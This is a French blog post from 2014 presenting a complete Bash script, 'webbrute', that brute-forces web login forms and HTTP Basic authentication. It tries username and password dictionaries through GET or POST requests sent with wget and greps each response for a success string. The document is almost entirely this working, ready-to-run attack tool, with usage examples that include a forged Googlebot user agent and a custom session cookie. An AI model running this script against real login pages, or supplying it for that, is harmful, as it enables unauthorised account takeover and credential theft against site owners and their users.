Cet article présente un script Bash de bruteforce d'authentification HTTP : les identifiants sont envoyés via les méthodes GET ou POST, ou via l'authentification HTTP Basic.




 
#!/bin/bash
 
 
 
#
# Settings, do not edit this, variables can be set using parameters
#
# Global state read by the rest of the script; VERBOSE and P are rewritten
# by the -v / -i options during argument parsing.
#
APP="webbrute"     # program name shown in the usage text
VERBOSE=0          # 1 when -v is given: print every candidate as it is tried
tmp="/tmp/.wget.bf"  # NOTE(review): not referenced anywhere else in this script as shown
V="\e[1;32m"       # ANSI escapes used on the "Found" line: green value
Y="\e[1;33m"       # yellow, used for the "wrong positive" warning
B="\e[1;29m"       # NOTE(review): SGR 29 is "not crossed out"; the visible effect is just bold (1)
N="\e[0m"          # reset attributes
P="0"              # 0 to match, 1 to not match (compared with grep's exit status on the response body)
 
 
 
#
# Synopsis
#
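#######################################
# Print the help text on stdout and exit.
# Globals:   APP (read)
# Arguments: $1 - exit status (defaults to 0); 0 for -h / no arguments,
#            1 when the command line is invalid
# Outputs:   help text on stdout
#######################################
function usage
{
  echo "
Usage  : $APP <-u url> <-d get-data> <-f dictionary> <-p pattern> [-c cookie] [-v] [-i] [-P|-B] [-U useragent] [-h]

 -u  target URL
 -d  GET/POST data; FUZZPASS (and optionally FUZZUSER) mark the fields to bruteforce
 -f  dictionary file (two files, usernames.lst,passwords.lst, when FUZZUSER is used)
 -p  pattern to match
 -i  mismatch pattern instead of match
 -c  cookie data
 -v  verbose
 -P  use post instead of get method
 -B  use basic authentication instead of get method
 -U  set useragent, default is : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
 -h  this help


Exemple:

$APP -u 'http://localhost/bfme.php' -d 'pass=FUZZPASS' -f passwords.lst -p BIENVENUE

> GET authentication bruteforce, using one field


$APP -u 'http://localhost/bfme.php' -d 'admin=FUZZUSER&pass=FUZZPASS&submit=Login' -f usernames.lst,passwords.lst \\
 -p Incorrect -i -c 'PHPSESSID=123456789; Date=123456789;' -P -U 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'

> POST authentication bruteforce (-P), two files are needed to bruteforce login/pass (usernames.lst first, then passwords.lst),
if Incorrect does not match (-i) then login succeeded; use a custom cookie and a custom useragent

"
  # Default to a successful exit when called without a status.
  exit "${1:-0}"
}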
 
 
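# No arguments at all: show the help. Every other validation is done after
# option parsing, so a missing mandatory option is reported explicitly
# instead of being guessed from the raw argument count.
[[ $# -eq 0 ]] && usage 0


# Mandatory values, set by -u / -d / -f / -p.
data="" ; url="" ; file="" ; pattern=""
# Raw cookie string from -c; sent as a "Cookie:" header when non-empty.
cookie=""

# Default action : GET (-P selects POST, -B selects HTTP Basic)
post=0 ; basic=0

# Default useragent
useragent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"

# Number of candidates tried so far
i=0

# Parse arguments. The leading ':' makes getopts hand unknown options and
# missing arguments to the '?' / ':' arms instead of printing on its own.
# '-w' is still accepted (and ignored) so older command lines keep working.
while getopts ":d:u:f:p:c:ihvwPBU:" option; do
  case $option in
    d)  data=$OPTARG ;;
    u)  url=$OPTARG ;;
    f)  file=$OPTARG ;;
    p)  pattern=$OPTARG ;;
    c)  cookie=$OPTARG ;;
    v)  VERBOSE=1 ;;
    i)  P="1" ;;
    P)  post=1  ; basic=0 ;;
    B)  basic=1 ; post=0 ;;
    U)  useragent=$OPTARG ;;   # the optstring says U: but the arm used to be a second 'u)', so -U never worked
    w)  ;;
    h)  usage 0 ;;
    :)  printf '%s: option -%s requires an argument\n' "$APP" "$OPTARG" >&2 ; usage 1 ;;
    \?) printf '%s: unknown option -%s\n' "$APP" "$OPTARG" >&2 ; usage 1 ;;
  esac
done
shift $((OPTIND - 1))

# -u, -d, -f and -p are all mandatory.
if [[ -z $url || -z $data || -z $file || -z $pattern ]]; then
  printf '%s: -u, -d, -f and -p are all required\n' "$APP" >&2
  usage 1
fi



#
# Helpers
#

#######################################
# Percent-encode every byte outside the RFC 3986 unreserved set, so that a
# candidate containing '&', '=', '+', '%' or a space is sent as one form
# value instead of being re-parsed by the server as extra fields.
# Arguments: $1 - string to encode
# Outputs:   encoded string on stdout (no newline)
#######################################
urlencode() {
  local LC_ALL=C              # work byte by byte, not by multibyte character
  local s=$1 out="" ch enc idx
  for (( idx = 0; idx < ${#s}; idx++ )); do
    ch=${s:idx:1}
    case $ch in
      [A-Za-z0-9._~-]) out+=$ch ;;
      *) printf -v enc '%%%02X' "'$ch" ; out+=$enc ;;
    esac
  done
  printf '%s' "$out"
}

#######################################
# Base64 of a string as a single line (no wrapping, no trailing newline),
# suitable for an Authorization header.
# Arguments: $1 - string to encode
#######################################
b64() {
  printf '%s' "$1" | base64 | tr -d '\n'
}

#######################################
# Number of lines in a file, counting a last line that lacks a newline.
# Arguments: $1 - file path
#######################################
count_lines() {
  grep -c '' -- "$1"
}

#######################################
# Send one request and grep the response body for $pattern.
# Globals:   action, url, pattern, wget_opts (read)
# Arguments: $1 - URL-encoded form data (query string for GET, body for POST)
#            $2 - "user:password" for BASIC (the form data is then unused)
# Returns:   0 if the pattern matched, 1 if it did not, 2 if wget reported a
#            network failure (its exit status 4). 2 never equals P, so a
#            dead host is not mistaken for a successful login in -i mode.
#            Other wget failures (e.g. an HTTP 401, which is the normal
#            negative answer in BASIC mode) are judged on the body alone.
#######################################
send_attempt() {
  local payload=$1 creds=$2 body wstat sep='?'
  case $action in
    POST)
      body=$(wget -q "${wget_opts[@]}" --post-data="$payload" -O - "$url" </dev/null)
      ;;
    BASIC)
      body=$(wget -q "${wget_opts[@]}" --header="Authorization: Basic $(b64 "$creds")" -O - "$url" </dev/null)
      ;;
    *)
      # Append with '&' when the URL already carries a query string.
      [[ $url == *\?* ]] && sep='&'
      body=$(wget -q "${wget_opts[@]}" -O - "$url$sep$payload" </dev/null)
      ;;
  esac
  wstat=$?
  if (( wstat == 4 )); then
    printf '\n%bWarning: network failure talking to %s, candidate skipped.%b\n' "$Y" "$url" "$N" >&2
    return 2
  fi
  grep -qiE -- "$pattern" <<<"$body"
}



#
# Parse data
#
# -d must contain a FUZZPASS placeholder; an optional FUZZUSER switches to the
# two-field (user + password) mode. A field name is anything but '&' / '='.
re_user='(^|&)([^&=]+)=FUZZUSER(&|$)'
re_pass='(^|&)([^&=]+)=FUZZPASS(&|$)'
field_user="" ; field_pass=""
[[ $data =~ $re_user ]] && field_user=${BASH_REMATCH[2]}
[[ $data =~ $re_pass ]] && field_pass=${BASH_REMATCH[2]}
if [[ -z $field_pass ]]; then
  printf '%s: -d data must contain a FUZZPASS placeholder\n' "$APP" >&2
  usage 1
fi
# F=1 : bruteforce the password only ; F=2 : user and password.
if [[ -n $field_user ]]; then F=2; else F=1; fi

if   (( basic == 1 )); then action="BASIC"
elif (( post  == 1 )); then action="POST"
else                        action="GET"
fi

# Options shared by every wget call. Credentials travel on wget's command
# line (--post-data / --header) and are therefore visible to other local
# users through ps; fine on a lab box, not on a shared host.
wget_opts=(--user-agent "$useragent")
[[ -n $cookie ]] && wget_opts+=(--header "Cookie: $cookie")



#
# Bruteforce one field : pass
#
if (( F == 1 )); then

  if [[ ! -r $file ]]; then
    printf '%s: cannot read dictionary %s\n' "$APP" "$file" >&2
    exit 1
  fi
  numline=$(count_lines "$file")

  echo
  # IFS= / -r keep leading blanks and backslashes in the candidate; the
  # '|| [[ -n ... ]]' still processes a last line that has no newline.
  while IFS= read -r BF_PASS || [[ -n $BF_PASS ]]; do

    i=$((i + 1))
    printf '\r[%s]  Tried : %5s passes / %5s  ' "$action" "$i" "$numline"
    (( VERBOSE )) && printf '\t %s= %-30s' "$field_pass" "$BF_PASS"

    # Only the placeholder is replaced, so every other field given with -d
    # (e.g. submit=Login) is sent unchanged and in its original position.
    enc_pass=$(urlencode "$BF_PASS")
    payload=${data//FUZZPASS/"$enc_pass"}
    # NOTE(review): HTTP Basic credentials are "user:password" (RFC 7617).
    # With a single FUZZPASS field there is no user name to send, so only
    # the password is encoded, as before; use FUZZUSER too for a real
    # Basic login.
    send_attempt "$payload" "$BF_PASS" ; e=$?

    if (( e == P )); then
      # A hit on the very first candidate usually means the pattern or -i
      # is wrong rather than a lucky guess.
      (( i == 1 )) && printf '\n\n%bWarning: potential wrong positive detected. Please check arguments.%b' "$Y" "$N"
      printf '\n\nFound: %b%s%b = %b %s%b\n\n' "$B" "$field_pass" "$N" "$V" "$BF_PASS" "$N"
      break
    fi

  done < "$file"

fi



#
# Bruteforce two fields : user & pass
#
if (( F == 2 )); then

  # -f takes two files: the user names first, then the passwords.
  if [[ $file != *,* ]]; then
    printf '%s: two dictionaries are required with FUZZUSER: -f usernames.lst,passwords.lst\n' "$APP" >&2
    usage 1
  fi
  file_user=${file%%,*}
  file_pass=${file#*,} ; file_pass=${file_pass%%,*}
  for dict in "$file_user" "$file_pass"; do
    if [[ ! -r $dict ]]; then
      printf '%s: cannot read dictionary %s\n' "$APP" "$dict" >&2
      exit 1
    fi
  done
  num_user=$(count_lines "$file_user")
  num_pass=$(count_lines "$file_pass")
  numline=$((num_user * num_pass))

  echo
  # The user file is read on fd 3 so that the inner loop's stdin redirect
  # cannot interfere with it.
  while IFS= read -r -u 3 BF_USER || [[ -n $BF_USER ]]; do

    # Encoded once per user rather than once per password.
    enc_user=$(urlencode "$BF_USER")

    while IFS= read -r BF_PASS || [[ -n $BF_PASS ]]; do

      i=$((i + 1))
      printf '\r[%s]  Tried : %5s passes / %5s  ' "$action" "$i" "$numline"
      (( VERBOSE )) && printf '\t %s= %-20s %s= %-30s' "$field_user" "$BF_USER" "$field_pass" "$BF_PASS"

      enc_pass=$(urlencode "$BF_PASS")
      payload=${data//FUZZUSER/"$enc_user"}
      payload=${payload//FUZZPASS/"$enc_pass"}
      # Basic credentials are "user:password" (RFC 7617); the previous
      # "field=user&field=pass" form is not a valid credential.
      send_attempt "$payload" "$BF_USER:$BF_PASS" ; e=$?

      if (( e == P )); then
        (( i == 1 )) && printf '\n\n%bWarning: potential wrong positive detected. Please check arguments.%b' "$Y" "$N"
        printf '\n\nFound: %b%s%b = %b %s%b \t %b%s%b = %b %s%b\n\n' \
          "$B" "$field_user" "$N" "$V" "$BF_USER" "$N" "$B" "$field_pass" "$N" "$V" "$BF_PASS" "$N"
        exit
      fi

    done < "$file_pass"

  done 3< "$file_user"

fi



#
# Nice style
#
printf "\n\n"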
 
 



   =>   Écrit par : Nicolas, le 07 juillet 2014


 
Mots clés :  
  web 
  
  php 
  
  security 